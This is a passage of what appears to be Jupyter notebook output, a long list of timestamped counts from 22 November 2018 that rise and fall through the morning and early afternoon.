"['2018-11-22 06:40:21.148194', 4]\n",
"['2018-11-22 06:40:35.016586', 5]\n",
"['2018-11-22 06:50:30.589280', 4]\n",
"['2018-11-22 06:57:47.358202', 5]\n",
"['2018-11-22 06:59:22.632457', 6]\n",
"['2018-11-22 06:59:25.212477', 7]\n",
"['2018-11-22 07:04:31.633821', 5]\n",
"['2018-11-22 07:04:54.396753', 6]\n",
"['2018-11-22 07:05:27.935746', 7]\n",
"['2018-11-22 07:05:29.781721', 8]\n",
"['2018-11-22 07:05:40.300064', 9]\n",
"['2018-11-22 07:05:41.546493', 10]\n",
"['2018-11-22 07:05:47.565033', 11]\n",
"['2018-11-22 07:05:58.531375', 12]\n",
"['2018-11-22 07:06:01.859989', 13]\n",
"['2018-11-22 07:06:18.625868', 14]\n",
"['2018-11-22 07:06:22.042752', 15]\n",
"['2018-11-22 07:06:25.113995', 16]\n",
"['2018-11-22 07:06:50.679288', 17]\n",
"['2018-11-22 07:06:53.896605', 18]\n",
"['2018-11-22 07:07:08.490923', 19]\n",
"['2018-11-22 07:07:12.113477', 20]\n",
"['2018-11-22 07:07:19.313335', 21]\n",
"['2018-11-22 07:07:33.363635', 22]\n",
"['2018-11-22 07:07:51.461701', 23]\n",
"['2018-11-22 07:08:06.528681', 24]\n",
"['2018-11-22 07:08:19.665602', 25]\n",
"['2018-11-22 07:08:42.723113', 26]\n",
"['2018-11-22 07:09:24.053606', 27]\n",
"['2018-11-22 07:09:24.981731', 28]\n",
"['2018-11-22 07:09:33.592126', 29]\n",
"['2018-11-22 07:10:51.595594', 27]\n",
"['2018-11-22 07:11:18.756848', 25]\n",
"['2018-11-22 07:12:03.109424', 24]\n",
"['2018-11-22 07:12:17.938549', 23]\n",
"['2018-11-22 07:12:47.980885', 21]\n",
"['2018-11-22 07:12:58.714003', 20]\n",
"['2018-11-22 07:13:05.211277', 19]\n",
"['2018-11-22 07:13:37.936283', 18]\n",
"['2018-11-22 07:13:38.629665', 17]\n",
"['2018-11-22 07:13:58.443574', 15]\n",
"['2018-11-22 07:14:14.711651', 16]\n",
"['2018-11-22 07:14:43.669301', 15]\n",
"['2018-11-22 07:15:14.878217', 11]\n",
"['2018-11-22 07:15:23.282166', 10]\n",
"['2018-11-22 07:16:26.379358', 9]\n",
"['2018-11-22 07:17:41.385382', 10]\n",
"['2018-11-22 07:18:50.112383', 8]\n",
"['2018-11-22 07:18:59.164829', 7]\n",
"['2018-11-22 07:19:49.522411', 6]\n",
"['2018-11-22 07:22:37.914772', 3]\n",
"['2018-11-22 07:22:42.424425', 4]\n",
"['2018-11-22 07:35:22.237975', 3]\n",
"['2018-11-22 07:39:14.581053', 4]\n",
"['2018-11-22 07:40:35.094367', 5]\n",
"['2018-11-22 07:43:00.667395', 6]\n",
"['2018-11-22 07:43:37.852870', 7]\n",
"['2018-11-22 07:44:02.653435', 8]\n",
"['2018-11-22 07:44:19.013294', 9]\n",
"['2018-11-22 07:45:06.362475', 10]\n",
"['2018-11-22 07:47:05.018377', 9]\n",
"['2018-11-22 07:47:40.800231', 10]\n",
"['2018-11-22 07:49:02.396985', 11]\n",
"['2018-11-22 07:49:06.806156', 12]\n",
"['2018-11-22 07:50:22.480764', 11]\n",
"['2018-11-22 07:50:40.779359', 12]\n",
"['2018-11-22 07:52:30.222181', 13]\n",
"['2018-11-22 07:52:40.258447', 14]\n",
"['2018-11-22 07:54:19.598305', 15]\n",
"['2018-11-22 07:55:07.604522', 16]\n",
"['2018-11-22 07:55:40.877043', 17]\n",
"['2018-11-22 07:56:06.605487', 18]\n",
"['2018-11-22 07:56:23.404287', 17]\n",
"['2018-11-22 07:56:52.562422', 16]\n",
"['2018-11-22 07:57:09.057794', 17]\n",
"['2018-11-22 07:57:23.291867', 18]\n",
"['2018-11-22 07:57:41.757979', 17]\n",
"['2018-11-22 07:57:55.605806', 16]\n",
"['2018-11-22 07:58:22.585104', 15]\n",
"['2018-11-22 07:58:41.599257', 16]\n",
"['2018-11-22 07:58:48.737072', 17]\n",
"['2018-11-22 07:58:49.926930', 18]\n",
"['2018-11-22 07:59:07.926575', 17]\n",
"['2018-11-22 08:00:04.866727', 16]\n",
"['2018-11-22 08:01:12.626656', 17]\n",
"['2018-11-22 08:01:19.872993', 16]\n",
"['2018-11-22 08:02:16.185196', 17]\n",
"['2018-11-22 08:03:22.634865', 16]\n",
"['2018-11-22 08:03:30.089005', 17]\n",
"['2018-11-22 08:03:56.599375', 15]\n",
"['2018-11-22 08:04:37.092474', 16]\n",
"['2018-11-22 08:04:39.273518', 17]\n",
"['2018-11-22 08:05:02.211510', 16]\n",
"['2018-11-22 08:05:12.323930', 17]\n",
"['2018-11-22 08:05:19.135973', 18]\n",
"['2018-11-22 08:06:37.359164', 15]\n",
"['2018-11-22 08:06:38.053764', 16]\n",
"['2018-11-22 08:06:43.294850', 17]\n",
"['2018-11-22 08:06:46.317048', 16]\n",
"['2018-11-22 08:06:49.820540', 17]\n",
"['2018-11-22 08:06:51.337618', 18]\n",
"['2018-11-22 08:06:55.079731', 19]\n",
"['2018-11-22 08:06:55.901997', 18]\n",
"['2018-11-22 08:07:01.384418', 19]\n",
"['2018-11-22 08:07:10.305510', 20]\n",
"['2018-11-22 08:07:28.297669', 19]\n",
"['2018-11-22 08:07:40.884067', 20]\n",
"['2018-11-22 08:07:58.074945', 19]\n",
"['2018-11-22 08:08:28.007202', 18]\n",
"['2018-11-22 08:08:37.992708', 17]\n",
"['2018-11-22 08:08:49.965755', 18]\n",
"['2018-11-22 08:08:57.719007', 19]\n",
"['2018-11-22 08:09:42.454012', 20]\n",
"['2018-11-22 08:09:51.744838', 19]\n",
"['2018-11-22 08:09:56.186040', 18]\n",
"['2018-11-22 08:10:02.763589', 17]\n",
"['2018-11-22 08:10:12.618465', 18]\n",
"['2018-11-22 08:10:32.172647', 19]\n",
"['2018-11-22 08:11:19.751337', 20]\n",
"['2018-11-22 08:12:20.356410', 19]\n",
"['2018-11-22 08:13:04.227353', 18]\n",
"['2018-11-22 08:13:21.086419', 19]\n",
"['2018-11-22 08:13:33.918954', 17]\n",
"['2018-11-22 08:13:47.079819', 15]\n",
"['2018-11-22 08:14:01.090813', 14]\n",
"['2018-11-22 08:14:01.491676', 15]\n",
"['2018-11-22 08:14:08.927053', 12]\n",
"['2018-11-22 08:14:47.407473', 10]\n",
"['2018-11-22 08:14:49.253417', 11]\n",
"['2018-11-22 08:15:01.054895', 10]\n",
"['2018-11-22 08:15:32.723361', 9]\n",
"['2018-11-22 08:16:36.626655', 10]\n",
"['2018-11-22 08:16:48.446089', 11]\n",
"['2018-11-22 08:16:50.562923', 12]\n",
"['2018-11-22 08:18:01.094074', 11]\n",
"['2018-11-22 08:18:22.824436', 10]\n",
"['2018-11-22 08:18:24.894581', 11]\n",
"['2018-11-22 08:19:04.344294', 10]\n",
"['2018-11-22 08:19:05.158286', 11]\n",
"['2018-11-22 08:19:05.728606', 12]\n",
"['2018-11-22 08:19:39.019620', 13]\n",
"['2018-11-22 08:22:24.284645', 8]\n",
"['2018-11-22 08:23:18.126679', 5]\n",
"['2018-11-22 08:24:20.453614', 6]\n",
"['2018-11-22 08:24:27.142150', 7]\n",
"['2018-11-22 08:25:27.474795', 6]\n",
"['2018-11-22 08:37:37.200225', 3]\n",
"['2018-11-22 08:53:27.564511', 4]\n",
"['2018-11-22 08:53:28.366813', 5]\n",
"['2018-11-22 08:54:00.515396', 6]\n",
"['2018-11-22 08:54:43.071632', 7]\n",
"['2018-11-22 08:55:14.248731', 8]\n",
"['2018-11-22 08:55:16.289864', 9]\n",
"['2018-11-22 08:55:25.123639', 10]\n",
"['2018-11-22 08:56:48.267047', 11]\n",
"['2018-11-22 08:57:31.440387', 10]\n",
"['2018-11-22 08:59:39.712021', 11]\n",
"['2018-11-22 08:59:39.772058', 12]\n",
"['2018-11-22 08:59:54.882223', 13]\n",
"['2018-11-22 09:00:22.589443', 14]\n",
"['2018-11-22 09:01:00.317811', 13]\n",
"['2018-11-22 09:02:57.150253', 12]\n",
"['2018-11-22 09:03:02.585902', 10]\n",
"['2018-11-22 09:03:38.191946', 11]\n",
"['2018-11-22 09:03:46.390013', 12]\n",
"['2018-11-22 09:03:57.432527', 13]\n",
"['2018-11-22 09:04:26.796326', 12]\n",
"['2018-11-22 09:05:27.197112', 10]\n",
"['2018-11-22 09:05:47.267949', 11]\n",
"['2018-11-22 09:06:00.742760', 12]\n",
"['2018-11-22 09:06:02.330283', 13]\n",
"['2018-11-22 09:06:11.064262', 14]\n",
"['2018-11-22 09:06:16.949592', 15]\n",
"['2018-11-22 09:07:00.771161', 16]\n",
"['2018-11-22 09:07:13.070714', 15]\n",
"['2018-11-22 09:07:22.042663', 16]\n",
"['2018-11-22 09:08:07.059070', 15]\n",
"['2018-11-22 09:08:18.262376', 16]\n",
"['2018-11-22 09:08:19.656444', 17]\n",
"['2018-11-22 09:09:01.035465', 18]\n",
"['2018-11-22 09:09:23.925026', 19]\n",
"['2018-11-22 09:09:28.944162', 18]\n",
"['2018-11-22 09:09:45.423767', 19]\n",
"['2018-11-22 09:10:00.828070', 18]\n",
"['2018-11-22 09:10:05.297527', 16]\n",
"['2018-11-22 09:10:23.317729', 17]\n",
"['2018-11-22 09:10:45.825092', 16]\n",
"['2018-11-22 09:10:55.646246', 17]\n",
"['2018-11-22 09:11:02.097115', 16]\n",
"['2018-11-22 09:11:13.217351', 15]\n",
"['2018-11-22 09:11:13.978584', 16]\n",
"['2018-11-22 09:11:54.234229', 14]\n",
"['2018-11-22 09:12:24.266862', 13]\n",
"['2018-11-22 09:13:12.464797', 12]\n",
"['2018-11-22 09:14:24.362628', 11]\n",
"['2018-11-22 09:14:44.882107', 10]\n",
"['2018-11-22 09:15:08.022205', 8]\n",
"['2018-11-22 09:15:26.428311', 6]\n",
"['2018-11-22 09:15:50.436071', 7]\n",
"['2018-11-22 09:16:24.469093', 8]\n",
"['2018-11-22 09:17:06.904191', 9]\n",
"['2018-11-22 09:17:36.904153', 8]\n",
"['2018-11-22 09:17:42.265749', 9]\n",
"['2018-11-22 09:18:06.904043', 8]\n",
"['2018-11-22 09:19:21.602278', 9]\n",
"['2018-11-22 09:19:43.326904', 10]\n",
"['2018-11-22 09:19:57.197692', 9]\n",
"['2018-11-22 09:20:36.903680', 7]\n",
"['2018-11-22 09:21:06.903581', 6]\n",
"['2018-11-22 09:21:32.409922', 7]\n",
"['2018-11-22 09:23:29.163208', 6]\n",
"['2018-11-22 09:23:44.599911', 5]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:24:29.599609', 4]\n",
"['2018-11-22 09:37:44.187051', 3]\n",
"['2018-11-22 09:38:25.138779', 4]\n",
"['2018-11-22 09:50:10.981066', 3]\n",
"['2018-11-22 09:51:20.588892', 4]\n",
"['2018-11-22 09:52:17.438122', 5]\n",
"['2018-11-22 09:52:43.583283', 6]\n",
"['2018-11-22 09:54:12.433215', 5]\n",
"['2018-11-22 09:56:55.903953', 6]\n",
"['2018-11-22 09:57:09.457822', 5]\n",
"['2018-11-22 09:58:04.099877', 6]\n",
"['2018-11-22 09:58:44.040860', 7]\n",
"['2018-11-22 09:59:15.343427', 8]\n",
"['2018-11-22 10:00:00.730174', 7]\n",
"['2018-11-22 10:00:35.283861', 8]\n",
"['2018-11-22 10:00:38.627234', 9]\n",
"['2018-11-22 10:01:15.786490', 10]\n",
"['2018-11-22 10:01:21.404250', 11]\n",
"['2018-11-22 10:01:50.230716', 12]\n",
"['2018-11-22 10:01:55.332512', 13]\n",
"['2018-11-22 10:02:05.073373', 12]\n",
"['2018-11-22 10:02:06.729515', 13]\n",
"['2018-11-22 10:02:26.976513', 14]\n",
"['2018-11-22 10:02:49.056352', 15]\n",
"['2018-11-22 10:03:22.079667', 14]\n",
"['2018-11-22 10:03:45.156106', 15]\n",
"['2018-11-22 10:04:02.128523', 16]\n",
"['2018-11-22 10:04:06.914095', 17]\n",
"['2018-11-22 10:04:08.253558', 18]\n",
"['2018-11-22 10:04:43.694682', 19]\n",
"['2018-11-22 10:05:06.913459', 18]\n",
"['2018-11-22 10:05:35.867043', 19]\n",
"['2018-11-22 10:05:52.923833', 18]\n",
"['2018-11-22 10:06:38.980001', 14]\n",
"['2018-11-22 10:06:50.972774', 13]\n",
"['2018-11-22 10:07:50.988435', 12]\n",
"['2018-11-22 10:08:09.037944', 11]\n",
"['2018-11-22 10:08:19.049324', 10]\n",
"['2018-11-22 10:08:39.067591', 9]\n",
"['2018-11-22 10:08:44.246696', 10]\n",
"['2018-11-22 10:08:48.300229', 11]\n",
"['2018-11-22 10:08:49.701482', 12]\n",
"['2018-11-22 10:08:50.403105', 13]\n",
"['2018-11-22 10:08:58.779299', 14]\n",
"['2018-11-22 10:09:01.496470', 15]\n",
"['2018-11-22 10:09:08.971582', 14]\n",
"['2018-11-22 10:09:15.839427', 13]\n",
"['2018-11-22 10:09:19.308127', 14]\n",
"['2018-11-22 10:09:31.162083', 15]\n",
"['2018-11-22 10:09:34.253436', 16]\n",
"['2018-11-22 10:09:36.536858', 17]\n",
"['2018-11-22 10:09:37.403438', 18]\n",
"['2018-11-22 10:09:45.603450', 19]\n",
"['2018-11-22 10:09:52.977310', 20]\n",
"['2018-11-22 10:10:18.953081', 21]\n",
"['2018-11-22 10:11:23.926816', 22]\n",
"['2018-11-22 10:11:30.605297', 23]\n",
"['2018-11-22 10:11:42.786611', 22]\n",
"['2018-11-22 10:12:07.303882', 23]\n",
"['2018-11-22 10:13:21.146896', 21]\n",
"['2018-11-22 10:13:46.502296', 20]\n",
"['2018-11-22 10:13:53.439998', 19]\n",
"['2018-11-22 10:13:54.981534', 20]\n",
"['2018-11-22 10:14:00.182926', 19]\n",
"['2018-11-22 10:14:06.692129', 20]\n",
"['2018-11-22 10:15:06.941431', 21]\n",
"['2018-11-22 10:15:12.901936', 20]\n",
"['2018-11-22 10:15:15.655350', 19]\n",
"['2018-11-22 10:15:22.636487', 18]\n",
"['2018-11-22 10:15:24.854014', 17]\n",
"['2018-11-22 10:15:42.310156', 15]\n",
"['2018-11-22 10:16:09.680671', 14]\n",
"['2018-11-22 10:16:35.974610', 13]\n",
"['2018-11-22 10:16:50.207337', 12]\n",
"['2018-11-22 10:17:07.419653', 11]\n",
"['2018-11-22 10:17:38.420519', 12]\n",
"['2018-11-22 10:18:01.290595', 13]\n",
"['2018-11-22 10:19:16.768306', 11]\n",
"['2018-11-22 10:19:23.182496', 10]\n",
"['2018-11-22 10:19:47.235465', 11]\n",
"['2018-11-22 10:22:11.243449', 8]\n",
"['2018-11-22 10:23:20.927128', 9]\n",
"['2018-11-22 10:23:44.599694', 8]\n",
"['2018-11-22 10:24:00.328195', 7]\n",
"['2018-11-22 10:26:26.704156', 5]\n",
"['2018-11-22 10:28:43.491552', 3]\n",
"['2018-11-22 10:32:26.657051', 4]\n",
"['2018-11-22 10:33:04.355258', 5]\n",
"['2018-11-22 10:39:37.537360', 3]\n",
"['2018-11-22 10:40:09.344259', 4]\n",
"['2018-11-22 10:48:44.303292', 3]\n",
"['2018-11-22 10:51:02.683999', 4]\n",
"['2018-11-22 10:55:36.191684', 5]\n",
"['2018-11-22 10:56:00.018998', 6]\n",
"['2018-11-22 10:56:18.283277', 5]\n",
"['2018-11-22 10:57:31.953218', 6]\n",
"['2018-11-22 10:57:57.450697', 7]\n",
"['2018-11-22 10:58:50.819889', 8]\n",
"['2018-11-22 10:59:06.362180', 9]\n",
"['2018-11-22 11:00:06.935472', 10]\n",
"['2018-11-22 11:00:44.981089', 9]\n",
"['2018-11-22 11:01:03.189449', 10]\n",
"['2018-11-22 11:01:07.331749', 11]\n",
"['2018-11-22 11:01:30.888003', 12]\n",
"['2018-11-22 11:01:42.828931', 13]\n",
"['2018-11-22 11:02:02.506410', 12]\n",
"['2018-11-22 11:02:24.395371', 13]\n",
"['2018-11-22 11:02:32.160290', 14]\n",
"['2018-11-22 11:02:43.818061', 15]\n",
"['2018-11-22 11:02:49.235785', 16]\n",
"['2018-11-22 11:02:52.114432', 15]\n",
"['2018-11-22 11:03:14.197809', 16]\n",
"['2018-11-22 11:03:40.883336', 17]\n",
"['2018-11-22 11:04:05.061835', 16]\n",
"['2018-11-22 11:04:07.028671', 17]\n",
"['2018-11-22 11:04:41.402798', 18]\n",
"['2018-11-22 11:04:44.452634', 19]\n",
"['2018-11-22 11:05:03.118759', 18]\n",
"['2018-11-22 11:05:06.465282', 19]\n",
"['2018-11-22 11:05:41.011012', 20]\n",
"['2018-11-22 11:05:49.030227', 19]\n",
"['2018-11-22 11:05:51.076861', 18]\n",
"['2018-11-22 11:05:53.484981', 19]\n",
"['2018-11-22 11:05:55.590286', 20]\n",
"['2018-11-22 11:06:08.388642', 21]\n",
"['2018-11-22 11:06:11.404207', 20]\n",
"['2018-11-22 11:06:17.029996', 19]\n",
"['2018-11-22 11:06:54.348337', 20]\n",
"['2018-11-22 11:07:35.864496', 18]\n",
"['2018-11-22 11:08:10.501432', 17]\n",
"['2018-11-22 11:08:15.255558', 18]\n",
"['2018-11-22 11:08:23.488227', 19]\n",
"['2018-11-22 11:08:24.328320', 20]\n",
"['2018-11-22 11:08:27.776364', 21]\n",
"['2018-11-22 11:08:30.107577', 22]\n",
"['2018-11-22 11:08:38.011619', 23]\n",
"['2018-11-22 11:08:42.794797', 22]\n",
"['2018-11-22 11:09:00.651608', 23]\n",
"['2018-11-22 11:09:11.960033', 24]\n",
"['2018-11-22 11:09:20.363873', 25]\n",
"['2018-11-22 11:09:30.221138', 26]\n",
"['2018-11-22 11:09:51.852646', 25]\n",
"['2018-11-22 11:10:06.032886', 24]\n",
"['2018-11-22 11:10:06.229719', 25]\n",
"['2018-11-22 11:10:13.556290', 24]\n",
"['2018-11-22 11:10:14.225701', 25]\n",
"['2018-11-22 11:10:16.246986', 26]\n",
"['2018-11-22 11:10:35.217997', 25]\n",
"['2018-11-22 11:10:40.403857', 24]\n",
"['2018-11-22 11:10:45.219161', 23]\n",
"['2018-11-22 11:10:47.420971', 24]\n",
"['2018-11-22 11:10:53.454388', 21]\n",
"['2018-11-22 11:10:55.233013', 20]\n",
"['2018-11-22 11:10:55.592082', 21]\n",
"['2018-11-22 11:10:57.654311', 20]\n",
"['2018-11-22 11:11:03.083156', 21]\n",
"['2018-11-22 11:11:57.805946', 22]\n",
"['2018-11-22 11:13:20.109636', 18]\n",
"['2018-11-22 11:13:29.344556', 19]\n",
"['2018-11-22 11:13:55.019052', 17]\n",
"['2018-11-22 11:14:06.286416', 18]\n",
"['2018-11-22 11:14:09.115644', 19]\n",
"['2018-11-22 11:14:15.695349', 20]\n",
"['2018-11-22 11:14:16.925264', 19]\n",
"['2018-11-22 11:14:21.927097', 20]\n",
"['2018-11-22 11:14:28.790893', 18]\n",
"['2018-11-22 11:14:31.102124', 17]\n",
"['2018-11-22 11:14:58.579128', 14]\n",
"['2018-11-22 11:15:04.748008', 13]\n",
"['2018-11-22 11:15:06.772877', 11]\n",
"['2018-11-22 11:15:07.041521', 12]\n",
"['2018-11-22 11:15:27.440609', 13]\n",
"['2018-11-22 11:15:56.251212', 14]\n",
"['2018-11-22 11:16:32.852538', 13]\n",
"['2018-11-22 11:16:46.595589', 14]\n",
"['2018-11-22 11:16:53.039300', 15]\n",
"['2018-11-22 11:17:06.115075', 16]\n",
"['2018-11-22 11:17:11.582048', 17]\n",
"['2018-11-22 11:17:21.589823', 16]\n",
"['2018-11-22 11:17:21.708665', 17]\n",
"['2018-11-22 11:17:30.665144', 18]\n",
"['2018-11-22 11:18:14.843720', 19]\n",
"['2018-11-22 11:18:41.165400', 16]\n",
"['2018-11-22 11:19:28.772876', 15]\n",
"['2018-11-22 11:20:53.507879', 13]\n",
"['2018-11-22 11:23:57.487507', 4]\n",
"['2018-11-22 11:43:26.159349', 3]\n",
"['2018-11-22 11:45:14.117574', 4]\n",
"['2018-11-22 11:51:49.662204', 3]\n",
"['2018-11-22 11:53:14.551172', 4]\n",
"['2018-11-22 11:53:58.298942', 5]\n",
"['2018-11-22 11:55:39.216384', 6]\n",
"['2018-11-22 11:55:42.277694', 7]\n",
"['2018-11-22 11:56:54.790458', 8]\n",
"['2018-11-22 11:59:27.017328', 9]\n",
"['2018-11-22 12:00:49.086506', 10]\n",
"['2018-11-22 12:01:11.731522', 9]\n",
"['2018-11-22 12:01:39.185625', 10]\n",
"['2018-11-22 12:01:57.322050', 11]\n",
"['2018-11-22 12:02:07.461875', 10]\n",
"['2018-11-22 12:02:11.822073', 11]\n",
"['2018-11-22 12:03:07.948596', 12]\n",
"['2018-11-22 12:03:28.058438', 13]\n",
"['2018-11-22 12:03:31.189637', 14]\n",
"['2018-11-22 12:04:01.777874', 13]\n",
"['2018-11-22 12:04:16.431641', 14]\n",
"['2018-11-22 12:04:34.028208', 15]\n",
"['2018-11-22 12:04:48.634378', 16]\n",
"['2018-11-22 12:04:51.744692', 17]\n",
"['2018-11-22 12:05:12.647873', 18]\n",
"['2018-11-22 12:05:18.245651', 19]\n",
"['2018-11-22 12:05:28.764807', 18]\n",
"['2018-11-22 12:05:42.476631', 17]\n",
"['2018-11-22 12:06:00.777908', 18]\n",
"['2018-11-22 12:06:32.895039', 19]\n",
"['2018-11-22 12:07:01.778530', 18]\n",
"['2018-11-22 12:07:46.777604', 14]\n",
"['2018-11-22 12:08:05.425501', 15]\n",
"['2018-11-22 12:08:08.446239', 16]\n",
"['2018-11-22 12:08:08.604729', 17]\n",
"['2018-11-22 12:08:09.991261', 18]\n",
"['2018-11-22 12:08:13.259357', 19]\n",
"['2018-11-22 12:08:23.897394', 18]\n",
"['2018-11-22 12:08:31.517488', 19]\n",
"['2018-11-22 12:08:35.271194', 18]\n",
"['2018-11-22 12:08:45.571099', 19]\n",
"['2018-11-22 12:08:57.891746', 20]\n",
"['2018-11-22 12:09:01.178246', 21]\n",
"['2018-11-22 12:09:04.802895', 22]\n",
"['2018-11-22 12:09:08.368759', 23]\n",
"['2018-11-22 12:09:09.624199', 24]\n",
"['2018-11-22 12:09:09.880783', 25]\n",
"['2018-11-22 12:09:17.005239', 24]\n",
"['2018-11-22 12:09:21.149145', 23]\n",
"['2018-11-22 12:09:47.181273', 21]\n",
"['2018-11-22 12:09:50.461158', 22]\n",
"['2018-11-22 12:09:53.114028', 23]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 12:09:58.886043', 22]\n",
"['2018-11-22 12:09:58.985654', 23]\n",
"['2018-11-22 12:10:04.046075', 22]\n",
"['2018-11-22 12:10:09.371308', 23]\n",
"['2018-11-22 12:10:29.625951', 24]\n",
"['2018-11-22 12:10:33.467032', 23]\n",
"['2018-11-22 12:10:45.159258', 24]\n",
"['2018-11-22 12:10:45.853363', 25]\n",
"['2018-11-22 12:10:48.697763', 26]\n",
"['2018-11-22 12:12:11.826504', 27]\n",
"['2018-11-22 12:12:33.135353', 26]\n",
"['2018-11-22 12:12:53.580189', 25]\n",
"['2018-11-22 12:12:55.625788', 24]\n",
"['2018-11-22 12:13:05.696859', 23]\n",
"['2018-11-22 12:13:52.249574', 22]\n",
"['2018-11-22 12:14:04.402000', 20]\n",
"['2018-11-22 12:14:39.726136', 21]\n",
"['2018-11-22 12:14:42.995052', 20]\n",
"['2018-11-22 12:15:11.538645', 19]\n",
"['2018-11-22 12:15:15.605974', 18]\n",
"['2018-11-22 12:15:21.672325', 17]\n",
"['2018-11-22 12:15:27.742679', 16]\n",
"['2018-11-22 12:15:29.760269', 15]\n",
"['2018-11-22 12:15:35.887368', 12]\n",
"['2018-11-22 12:15:39.964121', 11]\n",
"['2018-11-22 12:15:46.128645', 10]\n",
"['2018-11-22 12:16:04.544792', 11]\n",
"['2018-11-22 12:16:05.280437', 12]\n",
"['2018-11-22 12:16:12.550887', 11]\n",
"['2018-11-22 12:16:18.542205', 12]\n",
"['2018-11-22 12:16:39.990133', 11]\n",
"['2018-11-22 12:17:00.173130', 12]\n",
"['2018-11-22 12:17:17.476987', 13]\n",
"['2018-11-22 12:17:24.766172', 14]\n",
"['2018-11-22 12:17:55.172358', 15]\n",
"['2018-11-22 12:18:09.068083', 16]\n",
"['2018-11-22 12:18:31.304378', 17]\n",
"['2018-11-22 12:18:38.783377', 16]\n",
"['2018-11-22 12:18:40.809137', 15]\n",
"['2018-11-22 12:18:44.260387', 16]\n",
"['2018-11-22 12:19:03.032167', 17]\n",
"['2018-11-22 12:19:19.310760', 16]\n",
"['2018-11-22 12:19:21.700692', 17]\n",
"['2018-11-22 12:19:50.821630', 18]\n",
"['2018-11-22 12:20:22.299724', 16]\n",
"['2018-11-22 12:20:52.724734', 17]\n",
"['2018-11-22 12:20:54.119289', 18]\n",
"['2018-11-22 12:21:10.345103', 19]\n",
"['2018-11-22 12:22:35.394399', 18]\n",
"['2018-11-22 12:22:47.611000', 17]\n",
"['2018-11-22 12:23:40.568398', 12]\n",
"['2018-11-22 12:24:41.676322', 9]\n",
"['2018-11-22 12:43:02.140773', 3]\n",
"['2018-11-22 12:43:18.745269', 4]\n",
"['2018-11-22 12:47:03.086024', 3]\n",
"['2018-11-22 12:51:08.611255', 4]\n",
"['2018-11-22 12:53:30.801852', 5]\n",
"['2018-11-22 12:54:31.522451', 4]\n",
"['2018-11-22 12:55:26.741859', 5]\n",
"['2018-11-22 12:56:06.178904', 6]\n",
"['2018-11-22 12:56:12.580646', 7]\n",
"['2018-11-22 12:56:25.126968', 8]\n",
"['2018-11-22 12:56:35.027311', 9]\n",
"['2018-11-22 12:57:16.483030', 10]\n",
"['2018-11-22 12:57:17.631841', 11]\n",
"['2018-11-22 12:57:39.755429', 10]\n",
"['2018-11-22 12:57:55.531259', 11]\n",
"['2018-11-22 12:57:55.831732', 12]\n",
"['2018-11-22 12:59:27.780422', 13]\n",
"['2018-11-22 12:59:35.799726', 14]\n",
"['2018-11-22 12:59:45.768235', 15]\n",
"['2018-11-22 13:00:07.346886', 14]\n",
"['2018-11-22 13:00:12.658028', 13]\n",
"['2018-11-22 13:00:20.347157', 14]\n",
"['2018-11-22 13:00:35.256949', 15]\n",
"['2018-11-22 13:00:40.028961', 16]\n",
"['2018-11-22 13:00:40.495478', 17]\n",
"['2018-11-22 13:00:55.839415', 16]\n",
"['2018-11-22 13:01:35.489765', 17]\n",
"['2018-11-22 13:01:38.152024', 18]\n",
"['2018-11-22 13:01:40.662375', 19]\n",
"['2018-11-22 13:02:07.111289', 20]\n",
"['2018-11-22 13:02:42.883586', 16]\n",
"['2018-11-22 13:02:46.388894', 15]\n",
"['2018-11-22 13:02:49.259381', 16]\n",
"['2018-11-22 13:02:58.214428', 15]\n",
"['2018-11-22 13:03:06.035544', 16]\n",
"['2018-11-22 13:03:14.819182', 17]\n",
"['2018-11-22 13:03:21.805307', 18]\n",
"['2018-11-22 13:04:02.671166', 19]\n",
"['2018-11-22 13:04:08.196977', 18]\n",
"['2018-11-22 13:04:17.326836', 19]\n",
"['2018-11-22 13:04:20.886412', 18]\n",
"['2018-11-22 13:04:29.540545', 19]\n",
"['2018-11-22 13:04:38.156561', 18]\n",
"['2018-11-22 13:04:49.051333', 19]\n",
"['2018-11-22 13:04:54.757741', 20]\n",
"['2018-11-22 13:05:01.378541', 21]\n",
"['2018-11-22 13:05:05.559445', 22]\n",
"['2018-11-22 13:05:08.339022', 23]\n",
"['2018-11-22 13:05:15.696525', 22]\n",
"['2018-11-22 13:05:29.539712', 21]\n",
"['2018-11-22 13:05:34.983942', 22]\n",
"['2018-11-22 13:05:40.399874', 23]\n",
"['2018-11-22 13:05:42.980999', 22]\n",
"['2018-11-22 13:05:49.370269', 23]\n",
"['2018-11-22 13:06:07.475067', 22]\n",
"['2018-11-22 13:06:19.349398', 23]\n",
"['2018-11-22 13:07:09.538795', 21]\n",
"['2018-11-22 13:07:15.701299', 20]\n",
"['2018-11-22 13:08:05.930750', 19]\n",
"['2018-11-22 13:08:19.944369', 17]\n",
"['2018-11-22 13:08:37.789079', 18]\n",
"['2018-11-22 13:08:49.536724', 16]\n",
"['2018-11-22 13:08:54.757684', 15]\n",
"['2018-11-22 13:08:54.965443', 16]\n",
"['2018-11-22 13:09:04.360813', 15]\n",
"['2018-11-22 13:09:08.311581', 16]\n",
"['2018-11-22 13:09:35.900442', 17]\n",
"['2018-11-22 13:09:43.164679', 18]\n",
"['2018-11-22 13:10:25.064640', 17]\n",
"['2018-11-22 13:10:29.260342', 18]\n",
"['2018-11-22 13:10:32.703016', 19]\n",
"['2018-11-22 13:10:37.731647', 20]\n",
"['2018-11-22 13:12:33.088528', 21]\n",
"['2018-11-22 13:13:02.092492', 20]\n",
"['2018-11-22 13:13:40.128473', 21]\n",
"['2018-11-22 13:13:48.137146', 19]\n",
"['2018-11-22 13:13:54.626575', 20]\n",
"['2018-11-22 13:14:09.248274', 19]\n",
"['2018-11-22 13:14:10.538118', 20]\n",
"['2018-11-22 13:14:14.871793', 21]\n",
"['2018-11-22 13:14:15.604820', 22]\n",
"['2018-11-22 13:14:16.139730', 23]\n",
"['2018-11-22 13:14:26.187437', 24]\n",
"['2018-11-22 13:14:36.115729', 23]\n",
"['2018-11-22 13:14:40.564264', 22]\n",
"['2018-11-22 13:14:52.727046', 21]\n",
"['2018-11-22 13:15:01.380539', 20]\n",
"['2018-11-22 13:15:14.795923', 19]\n",
"['2018-11-22 13:15:19.225356', 18]\n",
"['2018-11-22 13:17:03.108887', 17]\n",
"['2018-11-22 13:17:07.809216', 18]\n",
"['2018-11-22 13:17:15.606747', 19]\n",
"['2018-11-22 13:17:36.370804', 20]\n",
"['2018-11-22 13:17:38.868668', 21]\n",
"['2018-11-22 13:17:43.869078', 22]\n",
"['2018-11-22 13:18:09.321341', 21]\n",
